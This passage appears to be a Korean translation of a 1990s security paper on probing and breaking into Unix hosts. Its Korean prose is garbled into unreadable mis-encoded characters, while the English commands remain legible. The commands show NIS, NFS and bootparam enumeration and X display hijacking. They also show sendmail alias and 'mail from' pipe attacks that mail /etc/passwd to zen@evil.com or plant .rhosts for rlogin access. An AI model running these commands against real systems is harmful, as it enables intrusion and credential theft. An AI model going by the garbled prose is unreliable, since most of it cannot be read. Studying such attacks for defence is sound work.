¼­ºñ½º°¡ ÀÖ´ÂÁö ¾ø´ÂÁö¿Í NFS¿¡ ´ëÇÑ Á¤º¸ µîÀ» ¾Ë·ÁÁØ´Ù. ¾Æ±î¿Í °°Àº ¸ñÇ¥½Ã½ºÅÛ
¿¡¼­ ¿¹¸¦ µé¾î º»´Ù.

evil % rpcinfo -p victim.com    [output trimmed for brevity's sake]
    program vers proto  port
    100004    2  tcp    673  ypserv
    100005    1  udp    721  mountd
    100003    2  udp  2049  nfs
    100026    1  udp    733  bootparam
    100017    1  tcp  1274  rexd

¿©±â¿¡¼­ ¸¹Àº Áß¿äÇÑ Á¤º¸µéÀ» º¼ ¼ö Àִµ¥, ù° ÀÌ ½Ã½ºÅÛÀÌ NIS ¼­¹ö¶õ »ç½Ç   
ÀÌ´Ù. ¾Æ¸¶ ¸¹ÀÌ ¾Ë·ÁÁ®ÀÖÁö´Â ¾Ê¾Ò¼­µµ ¼­¹öÀÇ NIS µµ¸ÞÀγ×ÀÓÀ» Çѹø ¾Ë°ÔµÇ¸é,
ÀÌ NIS ¼­¹öÀÇ ¼­ºê³×Æ® ¹Ù±ù¿¡ ÀÖ´ÙÇÒÁö¶óµµ °£´ÜÇÑ rpc query¸¦ ÅëÇØ NIS Maps
ÀÇ ¾î¶² °Íµµ ¾Ë¾Æ³¾ ¼ö ÀÖ´Ù. ¿¹¸¦ µé¾î ftp.uu.netÀÇ comp.sources.misc¿¡¼­
ãÀ» ¼ö ÀÖ´Â YPX¸¦ »ç¿ëÇÒ ¼ö ÀÖ´Ù. ´õ¿ì±â ÆÐ½º¿öµå¸¦ ÁüÀÛÇÒ ¼ö ÀÖ´Â °Í°ú
¸¶Âù°¡Áö·Î NIS µµ¸ÞÀγ×ÀÓµµ ½±°Ô ÁüÀÛ ÇÒ ¼ö ÀÖ´Ù. ºÎºÐÀûÀ¸·Î ȤÀº ÀüüÀûÀ¸·Î
¾Ë°ÔµÈ È£½ºÆ®À̸§(¿¹¸¦ µé¾î victim À̳ª victim.comµî), ±â°ü À̸§, "showmount"
µîÀ¸·Î ¾Ë°ÔµÈ netgroups À̸§ µîÀ¸·Î ÁüÀÛÇÒ ¼ö ÀÖ´Ù. "victim"À¸·Î ÁüÀÛÇϰí
½Í´Ù¸é ´ÙÀ½À» ÀÌ¿ëÇÑ´Ù.                                                       

 evil % ypwhich -d victim victim.com
 Domain victim not bound

À̰ÍÀº ½ÇÆÐÇÑ °æ¿ìÀÌ´Ù. ¸¸¾à ¼º°øÇÑ °æ¿ì¶ó¸é victim.comÀÇ NIS¼­¹ö È£½ºÆ®À̸§À» 
¹Ýȯ¹Þ°Ô µÈ´Ù. ±×·¯³ª victim.comÀÌ "/var"¸¦ ¿ÏÀüÈ÷ °³¹æÇϰí ÀÖ´Ù´Â »ç½ÇÀ»
NFS¿¡¼­ ¾Ë¼ö ÀÖ¾ú´Ù. ÀÌ µð·º·Î¸®¸¦ ¸¶¿îÆ®ÇÏ¿© "yp"¼­ºêµð·ºÅ丮¸¦ º¼ ¼ö Àִµ¥,
ȤÀº ´Ù¸¥ ¼­ºêµð·ºÅ丮¿¡¼­ ¸ñÇ¥½Ã½ºÅÛÀÇ µµ¸ÞÀγ×ÀÓÀ» ¾Ë ¼öµµ ÀÖÀ» °ÍÀÌ´Ù.
   
 evil # mount victim.com:/var /foo
 evil # cd /foo
 evil # /bin/ls -alg /foo/yp
 total 17
    1 drwxr-sr-x  4 root    staff        512 Jul 12 14:22 .
    1 drwxr-sr-x 11 root    staff        512 Jun 29 10:54 ..
  11 -rwxr-xr-x  1 root    staff      10993 Apr 22 11:56 Makefile
    1 drwxr-sr-x  2 root    staff        512 Apr 22 11:20 binding
    2 drwxr-sr-x  2 root    staff        1536 Jul 12 14:22 foo_bar
    [...]

ÀÌ °æ¿ì 'foo_bar"°¡ NIS µµ¸ÞÀÎ À̸§ÀÌ´Ù. ±×¸®°í °¡²û NIS ¸ÊÀº Å©·¢Å·À» À§ÇÑ   
ÆÐ½º¿öµå »Ó ¾Æ´Ï¶ó user/employee³ª ³»ºÎ È£½ºÆ®À̸§ ¸®½ºÆ® µîÀ» °¡Áö°í ÀÖÀ» ¼ö
ÀÖ´Ù. ºÎ·Ï C´Â NIS ÆÐ½º¿öµå ÆÄÀÏ¿¡ ´ëÇÑ »ç·ÊÀÇ °á°ú°¡ »ó¼¼È÷ ½Ç·ÁÀÖ´Ù.

---------------------------------------------------------------------------

rpcinfo °¡ victim.comÀÌ rexed¸¦ »ç¿ëÇϰí ÀÖ´Ù´Â °Íµµ ¾Ë·ÁÁÖ°í ÀÖ´Ù. rshd¿Í     
¸¶Âù°¡Áö·Î rexed´Â ¿ø°ÝÁö¿¡ ¸í·ÉÀ» ½ÇÇàÇÒ ¼ö ÀÖµµ·Ï ¿äûÇÏ´Â ¼­ºñ½ºÀÌ´Ù.
ÇÏÁö¸¸ rshd¿Í´Â ´Þ¸® hosts.eqiv³ª .rhostÀÇ Á¸Àç À¯¹«¿¡ »ó°ü¾ø´Ù. º¸Åë
rexed Ŭ¶óÀÌ¾ðÆ® ÇÁ·Î±×·¥ÀÌ ¸í·É¾î¿¡ ÀÖÁö¸¸ ´ÜÁö ÀûÀº C ÇÁ·Î±×·¥À» °¡Áö°í
ÀÖÀ¸¸ç ¾î¶² Ŭ¶óÀÌ¾ðÆ® È£½ºÆ®¿Í »ç¿ëÀÚ Á¤º¸¸¦ ¼­¹ö¿¡°Ô º¸³»¸é ¼­¹ö´Â ÀÌ ¸í·ÉÀ»
½ÇÇàÇÏ°Ô µÈ´Ù. ÀÌ·¯ÇÑ ÀÌÀ¯·Î rexed¸¦ ÀÌ¿ëÇÏ´Â °ÍÀº ¾Æ¹« ÆÐ½º¿öµå¸¦ °¡Áö°í ÀÖÁö
¾Ê´Â °Í°ú °°À¸¸ç Ŭ¶óÀÌ¾ðÆ®¿¡ º¸¾È Ã¥ÀÓÀÌ ÀÖ°Ô µÈ´Ù. rexedÀÇ º¸¾ÈÀº secure
rpc¸¦ »ç¿ëÇÔÀ¸·Î¼­ ÀÌ·ç¾îÁú ¼ö ÀÖ´Ù.
     
---------------------------------------------------------------------------

rpcinfoÀÇ °á°ú¿¡ µû¶ó ¿ì¸®´Â victim.comÀÌ µð½ºÅ©¾ø´Â ¿öÅ©½ºÅ×À̼ÇÀ» À§ÇÑ ¼­¹ö 
ÀÓÀ» ¾Ë ¼ö ÀÖ´Ù. À̰ÍÀº µð½ºÅ©¾ø´Â ¿öÅ©½ºÅ×À̼ÇÀÇ ºÎÆÃÀ» À§ÇÑ bootparamÀÌ ÀÖ´Â
°ÍÀ» º¸°í ¾Ë ¼ö ÀÖ´Ù. ¸¸¾à BOOTPARAMPROC_WHOAMI¿Í Ŭ¶óÀ̾ðÆ®ÀÇ ¾îµå·¹½º¸¦ ÀÌ¿ë
ÇÏ¿© Àß ¿äûÇϸé NIS µµ¸ÞÀγ×ÀÓÀ» ¾Ë¼ö ÀÖ´Ù. À̰ÍÀº µµ¸ÞÀγ×ÀÓÀ» ¾Ë¾Æ NIS ¸Ê(
¿¹¸¦ µé¾î ÆÐ½º¿öµå ÆÄÀϰú °°Àº °Í)°ú Àß °áÇÕÇÏ¸é ¿ì¼öÇÑ È¿°ú¸¦ °¡Áú ¼ö ÀÖ´Ù.
¿©±â °£´ÜÇÑ »ç·Ê ÇÁ·Î±×·¥ÀÌ ÀÖ´Ù.(bootparam Àº SATANÀÇ ÀϺÎ)
         
    char  *server;
    struct bp_whoami_arg arg;          /* query */
    struct bp_whoami_res res;          /* reply */

    /* initializations omitted... */

    callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI,
            xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res);

    printf("%s has nisdomain %s\n", server, res.domain_name);

"showmout"°á°ú´Â victim.comÀÇ µð½ºÅ©¾ø´Â ¿öÅ©½ºÅ×À̼ǵéÀÌ ½±´Ù´Â °ÍÀ» ¾Ë ¼ö   
Àִµ¥, ¿ì¸®´Â À̰͵éÀÇ ¾îµå·¹½º¸¦ BOOTPARAMPROC_WHOAMI query¿¡ »ç¿ëÇÑ´Ù.

 evil % bootparam victim.com easy.victim.com
 victim.com has nisdomain foo_bar

---------------------------------------------------------------------------

NIS ¸¶½ºÅÍ´Â NIS µµ¸ÞÀÎ ¿¡¼­ÀÇ Áú¹®¿¡ ´ëÇÑ mail alias¸¦ Á¦¾îÇÑ´Ù. ÇÑ ½Ã½ºÅÛ   
¿¡¼­ÀÇ mail alias ÆÄÀÏ Ã³·³ ¸ÞÀÏÀÌ Àü¼ÛµÉ¶§ ¸í·É¾î¸¦ ½ÇÇàÇϵµ·Ï mail alias
¸¦ ¸¸µé ¼ö ÀÖ´Ù. °¡Àå ÈçÇÑ »ç·Ê´Â ¸ÞÀÏÀ» Àü´ÞÇÒ ¶§ uudecode ¸¦ ½ÇÇàÇÏ´Â
"decode" alias ÀÌ´Ù. ¿¹¸¦ µé¾î "foo" ¶ó´Â alias ¸¦ ¸¸µé¾î ´ÙÀ½°ú °°ÀÌ
´Ü¼øÈ÷ ¸ÞÀÏÀ» º¸³¿À¸·Î¼­ evil.comÀ¸·Î ÆÐ½º¿öµå¸¦ ¸ÞÀÏ·Î º¸³»°Ô±Ý ÇÒ ¼ö ÀÖ´Ù.
   
 nis-master # echo 'foo: "| mail zen@evil.com < /etc/passwd "' >> /etc/aliases
 nis-master # cd /var/yp
 nis-master # make aliases
 nis-master # echo test | mail -v foo@victim.com

ħÀÔÀÚ°¡ NIS¸¶½ºÅÍ È£½ºÆ®¿¡ ´ëÇÑ Á¦¾î¸¦ °®Áö ¾Ê¾Æ¾ß ÇϰÚÁö¸¸, ¶ÇÇÑ ¸í¹éÇÑ     
±³ÈÆÀº NIS°¡ º¸¾ÈÀÌ ÀûÀýÇÏÁö ¾Ê¾Æ, ħÀÔÀÚ°¡ NIS ¸¶½ºÅ͸¦ Á¦¾îÇÒ ¼ö ÀÖ´Ù¸é
ħÀÔÀڴ Ŭ¶óÀÌ¾ðÆ®¿¡ ¸í·ÉÀ» ½ÇÇàÇÏ´Â °Í°ú °°Àº ½ÄÀ¸·Î µð½ºÅ©¾ø´Â ¿öÅ©½ºÅ×
À̼ǿ¡ ´ëÇØ Á¦¾îÇÒ ¼ö ÀÖ´Ù.                                                   

Ŭ¶óÀÌ¾îÆ®¿Í ¼­¹ö»çÀÌ¿¡ ÀûÀýÇÑ ÀÎÁõ¹æ¹ýÀÌ Á¦°øµÇÁö ¾ÊÀº º¸¾ÈÀÌ ÀûÀýÇÏÁö ¸øÇÑ   
NIS °ø°Ý¿¡ ´ëÇÑ ¿©·¯°¡Áö ´ëÀÀÃ¥ÀÌ ¾ø´Â ÆíÀÌ´Ù. ´õ¿ì±â ³ª»Û °ÍÀº ¾î¶² ¸ÊÀº
¸¶½ºÅÍ ¼­¹ö¿¡°Ôµµ °­¿äµÉ ¼ö À־ NIS¼­¹ö°¡ Ŭ¶óÀÌ¾ðÆ®°¡ µÇµµ·Ï Á¶Á¤ÇÒ ¼ö
Àֱ⵵ ÇÏ´Ù. ¸¸¾à ²À NIS¸¦ »ç¿ëÇϰíÀÚ ÇÑ´Ù¸é µµ¸ÞÀγ×ÀÓÀÌ ½±°Ô ÁüÀÛÇÒ ¼ö
¾øµµ·Ï ÇÏ´Â °ÍÀÌ Á¶±Ý µµ¿òÀÌ µÉ °ÍÀÌ´Ù. ÀÌ °æ¿ì ¸¸¾à ÀáÀçÀûÀÎ °ø°ÝÀÚ¿¡°Ô
µð½ºÅ© ¾ø´Â Ŭ¶óÀÌ¾ðÆ®°¡ °ø°³µÈ´Ù¸é µµ¸ÞÀγ×ÀÓÀ» ¾ò±âÀ§ÇÑ bootparam Æ®¸¯À»
»ç¿ëÇÏ´Â °£´ÜÇÑ ¹æ¹ýÀÌ ¼Ò¿ë¾ø°Ô ¸¸µé ¼ö ÀÖ´Ù.¸¸¾à NIS°¡ ÆÐ½º¿öµå ¸ÊÀ» ÀüÆÄÇϱâ
À§ÇØ »ç¿ëµÈ´Ù¸é ÀÌ¹Ì root ±ÇÇÑÀ» °¡Áø ħÀÔÀÚ°¡ ¾ÆÁ÷µµ Á¢±ÙÇÒ ¼ö ÀÖÀ¸¹Ç·Î
shadow ÆÐ½º¿öµå´Â ´õ ÀÌ»ó ÁÁÀº º¸¾ÈÀÌ µÇÁú ¾Ê´Â´Ù. ÁÁÀº °ÍÀº NIS¸¦ »ç¿ëÇÏÁö
¾Ê´Â °ÍÀ̸ç, ¸ÊÀÌ ÀáÀçÀûÀ¸·Î ¾î¶°ÇÑ °­Á¦¿¡ÀÇÇØ Á¾¼ÓµÇÁö ¾Êµµ·Ï ÃÖ¼ÒÈ­ÇÏ´Â
°ÍÀÌ´Ù.

Secure RPC´Â ÀÌ·¯ÇÑ À§ÇùÀ» ¸·´Â ¶Ç ´Ù¸¥ ¹æ¹öÀ̱ä ÇÏÁö¸¸ À̰ÍÀº °ü¸®Çϱ⿡µµ   
¾î·Á¿ì¸ç ¿©±â¿¡¼­ »ç¿ëµÈ ¾ÏÈ£ ±â¹ýÀÌ ¿ì¼öÇÏÁöµµ ¾Ê´Ù. SUNÀÌ »õ·Ó°Ô ¼±º¸ÀÎ
NIS+°¡ ÀÌ·¯ÇÑ ¹®Á¦Á¡À» ÇØ°áÇÏ¿´´Ù°í ÇÏÁö¸¸ Á¦ÇÑµÈ SUN¿¡¼­¸¸ µ¿ÀÛÇÏ¸ç ¿ø·¡ÀÇ
¼³°è »óÀÇ ÀÕÁ¡À» »ì¸± ¼öµµ ¾ø´Ù. ¸¶Áö¸·À¸·Î ÆÐŶ ÇÊÅ͸µ(port 111)À» ÀÌ¿ëÇϰÅ
³ª Securelib, SUNÀÇ sunpatch 100482-02 °¡ µµ¿òÀÌ µÉ °ÍÀÌ´Ù.
     

---------------------------------------------------------------------------

portmapper ´Â ´ÜÁö rpc ¼­ºñ½º¿¡ ´ëÇØ¼­¸¸ ¾Ë·ÁÁÖ´Â °ÍÀº ¾Æ´Ï´Ù. ´Ù¸¥ ³×         
Æ®¿öÅ© ¼­ºñ½º¿¡  ´ëÇØ¼­µµ ¸ðµç ³×Æ®¿öÅ© Æ÷Æ®¿¡  ´ëÇØ °­Á¦ÀûÀÎ ¹æ¹ýÀ¸·Î
À§Ä¡½Ãų ¼ö ÀÖ´Ù.  ¸¶Ä¡ sendmailÀº 25¹ø, telnet Àº 23  ¹ø, x window ´Â
6000 ¹ø À̵íÀÌ ¸ðµç ³×Æ®¿öÅ© ¼­ºñ½º´Â ƯÁ¤ Æ÷Æ®¿¡ ´ëÇØ µè°íÀÖ´Ù. SATAN
Àº ¿ø°ÝÁö ½Ã½ºÅÛ¿¡ ´ëÇØ  ³×Æ®¿öÅ© Æ÷Æ®¸¦ ½ºÄ³´×ÇÏ¸ç ¹ß°ßÇÑ Á¤º¸¸¦ º¸°í
ÇÏ´Â ÇÁ·Î±×·¥À» °¡Áö°í ÀÖ´Ù.  ¸ñÇ¥½Ã½ºÅÛ¿¡ ´ëÇØ ½ÇÇàÇÏ¸é ´ÙÀ½À» º¼ ¼ö
ÀÖ´Ù.
 
 evil % tcpmap victim.com
 Mapping 128.128.128.1
 port 21: ftp
 port 23: telnet
 port 25: smtp
 port 37: time
 port 79: finger
 port 512: exec
 port 513: login
 port 514: shell
 port 515: printer
 port 6000: (X)

ÀÌ  ½Ã½ºÅÛÀº X  Window ½Ã½ºÅÛÀ»  ½ÇÇàÇÏ°í  ÀÖ´Ù´Â °ÍÀ»  ¾Ë·ÁÁØ´Ù. ¸¸¾à         
magic cookie ³ª xhost ¸ÞÄ«´ÏÁò µîÀ» ½ÇÇàÇÏ¿© ÀûÀýÈ÷ º¸È£Çϰí ÀÖÁö ¾Ê°í
ÀÖ´Ù¸é, ¿øµµ¿ì µð½ºÇ÷¹À̰¡ ĸÃç´çÇϰųª º¸ÀÏ ¼ö ÀÖÀ¸¸ç, ȤÀº »ç¿ëÀÚÀÇ
ŰÀÔ·ÂÀÌ µµ¿ëµÇ°Å³ª ÇÁ·Î±×·¥ÀÌ ¿ø°ÝÁö¿¡¼­  ½ÇÇàµÉ ¼ö ÀÖ´Ù. ±×¸®°í ¸ñÇ¥
½Ã½ºÅÛÀÌ X ¸¦  ½ÇÇàÇÏ°í Æ÷Æ® 6000¹øÀ¸·ÎÀÇ telnet  À» ¹Þ¾ÆµéÀÎ´Ù¸é ¸ñÇ¥
½Ã½ºÅÛÀÇ x window ½Ã½ºÅÛÀÇ µ¿ÀÛÀ» ÀϽà Á¤Áö½ÃŰ´Â °Í°ú °°Àº ¼­ºñ½º°ÅºÎ
°ø°Ý¿¡ ÀÌ¿ëµÉ  ¼ö ÀÖ´Ù.  X ¼­¹öÀÇ Ãë¾àÁ¡À»  ¾Ë ¼ö  ÀÖ´Â ¶Ç´Ù¸¥ ¹æ¹ýÀº
XOpenDisplay() ÇÔ¼ö¸¦ ÀÌ¿ëÇÏ´Â °ÍÀ¸·Î¼­  ¸¸¾à ÀÌ ÇÔ¼ö°¡ NULL À» ¹ÝȯÇÑ
´Ù¸é ¸ñÇ¥ÀÇ µð½ºÇ÷¹ÀÌ¿¡ Á¢±ÙÇÒ ¼ö ¾ø´Ù. ÀÌ ±â´ÉÀº SATAN¿¡ Æ÷ÇÔµÈ ±â´É
ÀÌ´Ù. 

    char  *hostname;

    if (XOpenDisplay(hostname) == NULL) {
      printf("Cannot open display: %s\n", hostname);
    } else {
      printf("Can open display: %s\n", hostname);
    }

 evil % opendisplay victim.com:0
 Cannot open display: victim.com:0

¿ÏÀüÇÑ À¯´Ð½º º¸´Ù´Â ¶³¾îÁö´Â X  Å͹̳εµ ÀÚüÀÇ º¸¾È¹®Á¦¸¦ °¡Áú ¼ö ÀÖ         
´Ù. ¸¹Àº X Å͹̳ÎÀº Á¦ÇÑÀÌ  ¾ø´Â rsh Á¢±ÙÀ» Çã¿ëÇϰí ÀÖÀ¸¸ç, À̰ÍÀº ¸ñ
Ç¥½Ã½ºÅÛÀÇ Å͹̳ο¡¼­ X Ŭ¶óÀÌ¾ðÆ®¸¦  ½ÃÀÛÇÏ°Ô Çϸ鼭 °á°ú°¡ ÀÚ½ÅÀÇ ½º
Å©¸°¿¡ ³ª¿À°Ô ÇÒ ¼ö ÀÖ´Â °ÍÀÌ´Ù.

 evil % xhost +xvictim.victim.com
 evil % rsh xvictim.victim.com telnet victim.com -display evil.com

¾î¶² °æ¿ì¿¡µµ ÆÐ½º¿öµå ¾ø´Â °èÁ¤À̳ª  hosts.eqiv ÀÇ "+" ó·³ ´ç½ÅÀÇ ½Ã         
½ºÅÛÀÇ º¸¾ÈÀ» Ä§ÇØÇÏ´Â °Í°ú °°Àº  ÆÄÀϽýºÅÛ°ú ³×Æ®¿öÅ© º¸¾È ó·³ X À©
µµ¿ìÀÇ º¸¾Èµµ ¸¹Àº »ý°¢À» ÇÏ°Ô±Ý ÇÑ´Ù.

---------------------------------------------------------------------------
ÀÌÁ¦´Â sendmailÀ» º¸ÀÚ. sendmailÀº ÀÌÁ¦´Â ´ëºÎºÐÀÇ ½Ã½ºÅÛ¿¡¼­ ¸ø¾²°Ô±Ý         
µÇ¾îÀÖ±â´Â ÇÏÁö¸¸ ¾Ç¸í³ôÀº "wiz" ¸í·ÉÀÇ ¹®Á¦¸¦ Æ÷ÇÔÇÑ ¸¹Àº º¸¾È ¹®Á¦¸¦
°¡Áö°í ÀÖ´Â ¸Å¿ì º¹ÀâÇÑ ÇÁ·Î±×·¥ÀÌ´Ù. sendmail ÀÌ ¹ÝȯÇÑ ¹öÁ¯¹øÈ£¸¦ º¸
¾Æ ¸ñÇ¥½Ã½ºÅÛÀÇ OS ³ª ¶§¶§·Î ¹öÁ¯¹øÈ£ µîÀ» ¾Ë ¼ö ÀÖ´Ù. À̰ÍÀº ¿©·¯°¡Áö
¹ö±×µé Áß ¾î¶² Ãë¾àÁ¡ÀÌ ÇØ´çÇÏ´ÂÁö¸¦ ¾Ë¼öÀÖ°Ô±Ý ÇÑ´Ù. ´õ¿ì±â ¸¸¾à »ó´ë
ÆíÀÌ "decode" alias ¸¦ °¡Áö°í ÀÖ´Ù¸é ¸¹Àº ¹®Á¦¸¦ ¾Ë ¼ö ÀÖ´Â °ÍÀÌ´Ù.
 
 evil % telnet victim.com 25
 connecting to host victim.com (128.128.128.1.), port 25
 connection open
 220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
 expn decode
 250 <"|/usr/bin/uudecode">
 quit

"decode" alias  ´Â ¸Å¿ì À§ÇèÇÑ º¸¾È¹®Á¦¸¦  ¾ß±âÇϴµ¥, À̰ÍÀº °ø°ÝÀÚ°¡         
¾î¶² ÆÄÀÏ¿¡ ´ëÇØ ¾²±â¸¦ ÇÒ  ¼ö ÀÖµµ·ÏÇÑ´Ù. ƯÈ÷ ´ëºÎºÐÀº ¼ÒÀ¯ÁÖ°¡ µ¥¸ó
ÀÎ ÆÄÀÏÀÌÁö¸¸ ÀáÀçÀûÀ¸·Î´Â ¾î¶² »ç¿ëÀÚÀÇ ÆÄÀϵµ °¡´ÉÇÑ °ÍÀÌ´Ù. ´ÙÀ½ ¸Þ
ÀÏÀ» º¸¸é À̰ÍÀº "evil.com" ÀÇ zen »ç¿ëÀÚÀÇ .rhosts ÆÄÀÏÀ» º¸³»´Â °ÍÀÌ
´Ù.

 evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail decode@victim.com

¸¸¾à ¾î¶°ÇÑ È¨ µð·ºÅ丮µµ ¸øÃ£°í  ¶ÇÇÑ ¾²±â¸¦ ÇÒ ¼ö ¾ø´Ù¸é ´Ù¸¥ º¯ÇüÀ¸         
·Î¼­ ¸ñÇ¥½Ã½ºÅÛ¿¡ ¾î¶²  ¸í·ÉÀ» ½ÇÇàÇϵµ·Ï /etc/aliases.pag ÆÄÀÏ¿¡ ¹«¾ð
°¡  ÷°¡Çϴ  °ÍÀÌ´Ù.  ´ëºÎºÐÀÇ  ½Ã½ºÅÛµéÀÌ  ¸ÞÀÏ  alias  ¸¦  Á¦¾îÇÏ´Â
/etc/aliases.pag³ª aliases.dir ÆÄÀϵéÀÌ  ¿ÏÀüÈ÷ ¾²±â °³¹æµÇ¾îÀÖ¾î ¼º°ø
ÇÒ °¡´É¼ºÀÌ ³ô´Ù.

 evil % cat decode
 bin: "| cat /etc/passwd | mail zen@evil.com"
 evil % newaliases -oQ/tmp -oA`pwd`/decode
 evil % uuencode decode.pag /etc/aliases.pag | mail decode@victom.com
 evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null

¸¸¾à vrfy·Î ¾îµå·¹½º¸¦ È®ÀÎÇϰųª  expn À» ÅëÇØ ¾îµå·¹½º È®ÀåÀÌ µÈ´Ù´Â         
°ÍÀ» sendmail °úÀÇ  ´ëÈ­¸¦ ÅëÇØ ¾Ë ¼öÀÖ´Ù¸é ¸¹Àº  °ÍÀ» ¹ß°ßÇÒ ¼ö ÀÖ´Ù.
finger³ª rusers ¸¦ »ç¿ëÇÒ ¼ö ¾øÀ»  ¶§ vrfy ³ª expn ´Â »ç¿ëÀÚ³ª ¸ñÇ¥ ½Ã
½ºÅÛÀ» È®ÀÎÇϴµ¥ »ç¿ëµÉ  ¼ö ÀÖ´Ù. Vrfy ³ª expn  Àº vacation À̳ª mail
sorter ¿Í °°Àº  ¹®Á¦ÀÖ´Â ÇÁ·Î±×·¥°úÀÇ ÆÄÀÌÇÁ¸¦ ã´Âµ¥  »ç¿ëµÉ ¼ö ÀÖ´Ù.
vrfy ¿Í expn µîÀ»  ±ÝÁöÇÏ´Â °ÍÀÌ ÁÁÀºµ¥ ´ëºÎºÐÀÇ ¹öÁ¯¿¡¼­´Â srvrsmtp.c
ÀÇ ¼Ò½º¸¦ º¸°í CmdTab structure³»  "vrfy" ¿Í "expn" ¶óÀÎÀ» Áö¿ì°Å³ª ¹Ù
²Ù´Â °ÍÀÌ ÁÁ´Ù. ¼Ò½º°¡ ¾ø´Â °÷¿¡¼­µµ ¹ÙÀ̳ʸ® ¿¡µðÅ͸¦ ÅëÇØ 2°³ÀÇ ½ºÆ®
¸µÀ» °ø¹éÀ¸·Î ±³Ã¼ÇÏ¿© Áö¿ï ¼ö ÀÖ´Ù. ºÎ·Ï D ¿¡¼­ º¸ÀÌ´Â °Í°ú °°ÀÌ ÃÖ½Å
ÀÇ sendmail ¹öÁ¯À¸·Î ±³Ã¼ÇÏ´Â °Íµµ ÇϳªÀÇ ¹æ¹ýÀÌ´Ù.
                                                                               
---------------------------------------------------------------------------

sendmail-sendoff  ¿¡¼­µµ  Àß  ¾Ë·ÁÁø  ¹ö±×°¡  2°³  ÀÖ´Ù.  óÀ½  ¹ö±×´Â         
Berkeley ¿¡¼­ 5.59 ¹öÁ¯¿¡¼­ ºÐ¸íÇÏ°Ô ¹®Á¦¸¦ ÇØ°áÇÏ¿´´Ù. ÀÌÀü ¹öÁ¯¿¡ ´ë
ÇØ¼­´Â "evil.com"ÀÌ ¿¡·¯¸Þ¼¼Áö¿¡µµ  ºÒ±¸Çϰí ÁöÁ¤ÇÑ ÆÄÀÏÀÌ ¸ÞÀÏ Çì´õ¿¡
÷ºÎµÇ¾î ¹ÞÀ» ¼ö ÀÖ´Ù.

 % cat evil_sendmail
 telnet victim.com 25 << EOSM
 rcpt to: /home/zen/.rhosts
 mail from: zen
 data
 random garbage
 .
 rcpt to: /home/zen/.rhosts
 mail from: zen
 data
 evil.com
 .
 quit
 EOSM

 evil % /bin/sh evil_sendmail
 Trying 128.128.128.1
 Connected to victim.com
 Escape character is '^]'.
 Connection closed by foreign host.

 evil % rlogin victim.com -l zen
        Welcome to victim.com!
 victim %

2¹øÂ° ¹®Á¦´Â ÃÖ±Ù¿¡ ¹ß°ßµÈ °ÍÀ¸·Î¼­ ¼Û½ÅÀÚ°¡ ¾î¶² ½© ¸í·ÉÀ» Á¤ÀÇÇϰųª         
¼Û½ÅÀÚ³ª ¸ñÀûÁö ¾îµå·¹½º µîÀÇ ÆÐ½ºÀ̸§À» ÁöÁ¤ÇÏ´Â °ÍÀ» Çã¿ëÇÏ´Â °ÍÀ̵ú
´Ù. ¿©±â¿¡¼­ ÀÚ¼¼ÇÑ  ¼³¸íÀº »ý·«ÇÏÁö¸¸ usenet news  ³ª ±âŸ¿¡¼­ ¾Ë·ÁÁø
¹Ù°¡ ÀÖÀ¸¹Ç·Î »ý·«ÇÏ¸ç ´ëºÎºÐÀÇ sendmail ¿¡¼­ ¹®Á¦°¡ ÀÖ´Ù. ÇÏÁö¸¸ ´ëÇ¥
ÀûÀÎ °ø°Ý ÇüÅ´ ´ÙÀ½°ú °°´Ù.

 evil % telnet victim.com 25
 Trying 128.128.128.1...
 Connected to victim.com
 Escape character is '^]'.
 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
 mail from: "|/bin/mail zen@evil.com < /etc/passwd"
 250 "|/bin/mail zen@evil.com < /etc/passwd"... Sender ok
 rcpt to: nosuchuser
 550 nosuchuser... User unknown
 data
 354 Enter mail, end with "." on a line by itself
 .
 250 Mail accepted
 quit
 Connection closed by foreign host.
 evil %

Áö±Ý sendmail ¹öÁ¯  8.6.4 ´Â ´ÜÁö ¸î¸î  ¾öü¿¡¼­¸¸ ¸¹Àº º¸¾ÈÃë¾àÁ¡µéÀ»         
ÇØ°áÇϰí ÀÖ´Â °ÍÀ¸·Î ¾Ë·ÁÁö°í ÀÖÀ¸¸ç ºÎ·Ï D ¸¦ Âü°íÇϱ⠹ٶõ´Ù.


Trust

¿ì¸®ÀÇ ¸¶Áö¸· ÁÖÁ¦·Î¼­ ¾à°£  ÀÌ·ÐÀûÀÎ ÀÔÀå¿¡¼­ ½Å·Ú(Trust) ¹®Á¦¸¦ »ìÆì         
º¸±â·Î ÇÑ´Ù. À̰ÍÀº ´ëºÎºÐ ¾î¶²  ±â°ü ³»ºÎ¿¡¼­ ÀÚ¿ø °øÀ¯ÀÇ ÀÔÀå¿¡¼­ ÆÐ
½º¿öµå³ª ±âŸ ÀÎÁõ ¹æ¹ýÀ» ÅëÇÏÁö ¾Ê´Â °ÍÀ» ÀǹÌÇϴµ¥, Ŭ¶óÀÌ¾ðÆ®¿¡ ´ë
ÇÑ Á¦ÇÑÀ» ¾î¶»°Ô ÇÒ ¼ö ÀÖ³ª¿¡ ´ëÇØ ¸»ÇÏ·Á´Â °ÍÀÌ´Ù.
 
È£½ºÆ®°¡  ½Å·ÚÇϴ  ¹æ¹ýÀº ¿©·¯°¡Áö°¡  ÀÖÀ»  ¼ö  ÀÖ´Ù. hosts.equiv  ³ª
.rhosts ¿¡¼­ ÆÐ½º¿öµå¸¦ ¹¯Áö ¾Ê°í Á¢±ÙÀ» Çã¿ëÇÏ´Â ¹æ¹ý, ¿ø°ÝÁö½Ã½ºÅÛÀÌ
±ÇÇÑÀ» »ç¿ëÇϰųª ³²¿ëÇϵµ·Ï ÇØÁÖ´Â X  ¼­¹ö, NFS Á¦¾î¸¦ ÅëÇÑ ÆÄÀÏÀÇ °³
¹æ µîÀÌ´Ù. ¸ðµç °ÍµéÀº Ŭ¶óÀÌ¾ðÆ®µéÀÇ ¾îµå·¹½º¸¦ È£½ºÆ®À̸§À¸·Î º¯È¯ÇÒ
¶§  ÀÌ ¼­ºñ½º¸¦  ¹ÞÀ»¼ö  ÀÖÀ»Áö ¾øÀ»Áö°¡  °áÁ¤µÈ´Ù.  Á÷Á¢  ÇÏ´Â ¹æ¹ýÀº
